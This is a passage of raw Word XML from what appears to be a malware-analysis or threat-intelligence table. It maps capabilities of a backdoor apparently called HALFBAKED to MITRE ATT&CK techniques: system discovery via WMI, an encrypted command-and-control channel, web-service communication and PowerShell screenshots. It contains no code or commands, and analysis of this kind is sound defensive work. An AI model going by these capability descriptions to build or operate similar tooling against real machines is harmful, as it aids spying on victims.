                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>NP-EXE</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3632" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6E6BF6A4" w14:textId="77777777" w:rsidR="00E02B5D" w:rsidRPr="00487795" w:rsidRDefault="00E02B5D" w:rsidP="007A4104">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t xml:space="preserve">[1] </w:t>
            </w:r>
            <w:r w:rsidRPr="009B3A83">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>info: Sends victim machine information (OS, Processor, BIOS and running processes) using WMI queries</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="006D3412" w:rsidRPr="00487795" w14:paraId="46CAA2BA" w14:textId="77777777" w:rsidTr="00794624">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="440" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5CAFB4A4" w14:textId="5A35782C" w:rsidR="004F28B4" w:rsidRPr="00487795" w:rsidRDefault="0029643D" w:rsidP="004F28B4">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>2</w:t>
            </w:r>
            <w:r w:rsidR="003B2688">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>7</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1260" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5BB1E01A" w14:textId="72474BCD" w:rsidR="004F28B4" w:rsidRPr="00487795" w:rsidRDefault="004F28B4" w:rsidP="004F28B4">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>TA</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve">0007 </w:t>
            </w:r>
            <w:r w:rsidR="00B33956">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>:</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidR="00B33956">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve"> Execution</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2333" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="51EF2E32" w14:textId="4F93E04E" w:rsidR="004F28B4" w:rsidRPr="00487795" w:rsidRDefault="004F28B4" w:rsidP="004F28B4">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>T</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve">1082 </w:t>
            </w:r>
            <w:r w:rsidR="00E02B5D">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>:</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidR="00E02B5D">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>System Information Discovery</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="635" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5FCC0B74" w14:textId="431FFD14" w:rsidR="004F28B4" w:rsidRPr="00487795" w:rsidRDefault="00C42BE2" w:rsidP="004F28B4">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>2</w:t>
            </w:r>
            <w:r w:rsidR="0081790D">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>6</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="591" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2903ED44" w14:textId="77777777" w:rsidR="004F28B4" w:rsidRPr="00487795" w:rsidRDefault="004F28B4" w:rsidP="004F28B4">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="555" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1D758482" w14:textId="307F1ECD" w:rsidR="004F28B4" w:rsidRPr="00487795" w:rsidRDefault="004F28B4" w:rsidP="004F28B4">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>S</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1010" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="31E0526F" w14:textId="17FD436B" w:rsidR="004F28B4" w:rsidRPr="00487795" w:rsidRDefault="00C40195" w:rsidP="004F28B4">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>NP-DIS</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3632" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="05C73861" w14:textId="147A1892" w:rsidR="004F28B4" w:rsidRPr="00487795" w:rsidRDefault="009B3A83" w:rsidP="004F28B4">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t xml:space="preserve">[1] </w:t>
            </w:r>
            <w:r w:rsidR="00E02B5D">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>See above</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00770F8D" w:rsidRPr="00770F8D" w14:paraId="75094DC4" w14:textId="77777777" w:rsidTr="007A4104">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="440" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="11CCAEC1" w14:textId="2A398DF4" w:rsidR="00770F8D" w:rsidRPr="00770F8D" w:rsidRDefault="00770F8D" w:rsidP="007A4104">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00770F8D">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>2</w:t>
            </w:r>
            <w:r w:rsidR="003B2688">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>8</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1260" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7458DD9A" w14:textId="77777777" w:rsidR="00770F8D" w:rsidRPr="00770F8D" w:rsidRDefault="00770F8D" w:rsidP="007A4104">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00770F8D">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>TA</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="00770F8D">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>0011 :</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="00770F8D">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve"> Command &amp; Control</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2333" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="103A65B1" w14:textId="77777777" w:rsidR="00770F8D" w:rsidRPr="00770F8D" w:rsidRDefault="00770F8D" w:rsidP="007A4104">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00770F8D">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>T</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="00770F8D">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>1573 :</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="00770F8D">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve"> Encrypted Channel</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="635" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2B5BFDCF" w14:textId="5FE0CC9E" w:rsidR="00770F8D" w:rsidRPr="00770F8D" w:rsidRDefault="00770F8D" w:rsidP="007A4104">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00770F8D">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>2</w:t>
            </w:r>
            <w:r w:rsidR="0081790D">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>7</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="591" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0324C51F" w14:textId="77777777" w:rsidR="00770F8D" w:rsidRPr="00770F8D" w:rsidRDefault="00770F8D" w:rsidP="007A4104">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="555" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="34AADE59" w14:textId="77777777" w:rsidR="00770F8D" w:rsidRPr="00770F8D" w:rsidRDefault="00770F8D" w:rsidP="007A4104">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00770F8D">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>G</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1010" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1A20DCFF" w14:textId="77777777" w:rsidR="00770F8D" w:rsidRPr="00770F8D" w:rsidRDefault="00770F8D" w:rsidP="007A4104">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00770F8D">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>IF-C2C</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3632" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="79CAD2E3" w14:textId="77777777" w:rsidR="00770F8D" w:rsidRPr="00770F8D" w:rsidRDefault="00770F8D" w:rsidP="007A4104">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00770F8D">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>[1] HALFBAKED C2C</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="006D3412" w:rsidRPr="00B857D7" w14:paraId="28969440" w14:textId="77777777" w:rsidTr="00794624">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="440" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7232417A" w14:textId="28512048" w:rsidR="004F28B4" w:rsidRDefault="0029643D" w:rsidP="004F28B4">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>2</w:t>
            </w:r>
            <w:r w:rsidR="003B2688">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>9</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1260" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0D06E813" w14:textId="77777777" w:rsidR="004F28B4" w:rsidRPr="00B857D7" w:rsidRDefault="004F28B4" w:rsidP="004F28B4">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0067433A">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>TA</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="0067433A">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>0011 :</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="0067433A">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t xml:space="preserve"> Command &amp; Control</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2333" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5D01D307" w14:textId="77777777" w:rsidR="004F28B4" w:rsidRPr="00B857D7" w:rsidRDefault="004F28B4" w:rsidP="004F28B4">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="008B3AF0">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>T1102.002 :</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="008B3AF0">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t xml:space="preserve"> &lt;Web Service&gt;:Bidirectional Communication</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="635" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2A09A13D" w14:textId="554D6F29" w:rsidR="004F28B4" w:rsidRDefault="00C42BE2" w:rsidP="004F28B4">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>2</w:t>
            </w:r>
            <w:r w:rsidR="0081790D">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>7</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="591" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1AF4C3A4" w14:textId="77777777" w:rsidR="004F28B4" w:rsidRPr="00B857D7" w:rsidRDefault="004F28B4" w:rsidP="004F28B4">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="555" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6CA713A3" w14:textId="17CD69EE" w:rsidR="004F28B4" w:rsidRPr="00B857D7" w:rsidRDefault="004F28B4" w:rsidP="004F28B4">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>S</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1010" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4E7B7800" w14:textId="7443F055" w:rsidR="004F28B4" w:rsidRPr="00B857D7" w:rsidRDefault="00C40195" w:rsidP="004F28B4">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>IF-C2C</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3632" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="71B785D8" w14:textId="52FCB77E" w:rsidR="004F28B4" w:rsidRPr="00B857D7" w:rsidRDefault="007B4550" w:rsidP="004F28B4">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>[1] HALFBAKED C2C</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="006559B2" w:rsidRPr="00B857D7" w14:paraId="78D195CD" w14:textId="77777777" w:rsidTr="007A4104">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="440" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="20E2294A" w14:textId="11D2E98A" w:rsidR="006559B2" w:rsidRDefault="003B2688" w:rsidP="006559B2">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>30</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1260" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1F56C012" w14:textId="63831795" w:rsidR="006559B2" w:rsidRPr="00B857D7" w:rsidRDefault="006559B2" w:rsidP="006559B2">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333" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5E133141" w14:textId="4AE924DF" w:rsidR="006559B2" w:rsidRPr="00B857D7" w:rsidRDefault="006559B2" w:rsidP="006559B2">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="006559B2">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>T1059.001</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="0067433A">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>:</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="0067433A">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="006559B2">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>Command and Scripting Interpreter: PowerShell</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="635" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="215565BA" w14:textId="21772C2A" w:rsidR="006559B2" w:rsidRDefault="0081790D" w:rsidP="006559B2">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>29</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="591" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="642C659D" w14:textId="77777777" w:rsidR="006559B2" w:rsidRPr="00B857D7" w:rsidRDefault="006559B2" w:rsidP="006559B2">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="555" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="16431819" w14:textId="31D07945" w:rsidR="006559B2" w:rsidRPr="00B857D7" w:rsidRDefault="006559B2" w:rsidP="006559B2">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>S</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1010" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="27002551" w14:textId="25C90BAF" w:rsidR="006559B2" w:rsidRPr="00B857D7" w:rsidRDefault="006559B2" w:rsidP="006559B2">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>NP-EXE</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3632" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4BA44AAC" w14:textId="77777777" w:rsidR="006559B2" w:rsidRPr="00B857D7" w:rsidRDefault="006559B2" w:rsidP="006559B2">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t xml:space="preserve">[1] </w:t>
            </w:r>
            <w:r w:rsidRPr="006559B2">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>screenshot: Takes screen shot of victim machine (using 58d2a83f777688.78384945.ps1)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="006D3412" w:rsidRPr="00B857D7" w14:paraId="0AD06B8D" w14:textId="77777777" w:rsidTr="00794624">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="440" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="17BB0499" w14:textId="6A44BFED" w:rsidR="004F28B4" w:rsidRDefault="003B2688" w:rsidP="004F28B4">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>31</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1260" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7CAC22EB" w14:textId="4409311D" w:rsidR="004F28B4" w:rsidRPr="00B857D7" w:rsidRDefault="004F28B4" w:rsidP="004F28B4">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 xml:space="preserve">0009 </w:t>
            </w:r>
            <w:r w:rsidR="00E02B5D">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
